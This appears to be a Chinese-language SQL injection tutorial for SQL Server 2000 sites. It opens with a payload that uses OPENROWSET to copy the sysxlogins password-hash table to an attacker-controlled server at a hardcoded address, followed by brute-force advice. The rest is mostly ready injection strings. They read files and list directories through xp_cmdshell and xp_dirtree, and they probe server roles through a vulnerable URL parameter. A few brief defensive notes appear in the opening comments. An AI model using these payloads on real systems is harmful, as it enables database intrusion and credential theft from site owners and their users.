-- Hash-exfiltration payload (SQL Server 2000 era). It copies the victim's
-- login table into a table on a SQL Server the attacker controls, using
-- OPENROWSET as a linked-server *write* target: the uid/pwd/Address in the
-- connection string belong to the attacker's listener, not to the victim.
-- Pre-conditions: the injected session must be able to read sysxlogins and
-- the victim host must allow ad hoc distributed queries plus outbound
-- TCP/1433 to the listener.
-- NOTE(review): on SQL Server 2000 sysxlogins lives in master; the
-- `database.` prefix here is presumably a placeholder for the source DB
-- (and DATABASE is a reserved word) — confirm before reuse.
-- Defensive checks: disable "Ad Hoc Distributed Queries", block outbound
-- 1433 from database hosts, and alert on OPENROWSET/OPENDATASOURCE in
-- query logs.
INSERT INTO OPENROWSET(
    'SQLOLEDB',
    'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;',
    'select * from _sysxlogins'
)
SELECT *
FROM database.dbo.sysxlogins;
得到 hash 之后,就可以进行暴力破解。这需要一点运气和大量时间。(注:sysxlogins 只存在于 SQL Server 2000,2005 及以后已由 sys.sql_logins 取代;下文各 xp_* 扩展存储过程的可用性也以 2000 为准,xp_cmdshell 在新版本中默认关闭。)

遍历目录的方法:先创建一个临时表 temp(四列,以便承接 xp_availablemedia 返回的四列结果):
5';create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
5';insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
5';insert into temp(id) exec master.dbo.xp_subdirs 'c:/';-- 获得子目录列表
5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';-- 获得所有子目录的目录树结构,并存入temp表中
5';insert into temp(id) exec master.dbo.xp_cmdshell 'type c:/web/index.asp';-- 查看某个文件的内容
5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/';--
5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/ *.asp /s/a';--
5';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:/Inetpub/AdminScripts/adsutil.vbs enum w3svc';--
5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';-- (xp_dirtree适用权限PUBLIC;xp_cmdshell 则需要 sysadmin)

写入表:先用下面的语句判断当前连接所属的角色(IS_SRVROLEMEMBER / IS_MEMBER 返回 1 表示是该角色成员):
语句1:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
语句2:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
语句3:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
语句4:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
语句5(与语句4重复):http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
语句6:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
语句7:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
语句8(与语句7重复):http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
语句9:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER('db_owner'));--

把路径写到表中去(dirs 的两列对应 xp_dirtree 返回的 subdirectory、depth 两列):
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)--
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'c:/'--
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)--
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))-- (用 not in 排除已读到的路径,逐条取出下一条)
语句:http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)--
语句:http://www.xxxxx.com/down/list.asp?id=1;insert dirs1 exec master.dbo.xp_dirtree 'e:/web'-- (原文写作 insert dirs,但上一句建的表和下一句读取的表都是 dirs1,应为笔误)
语句:http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)--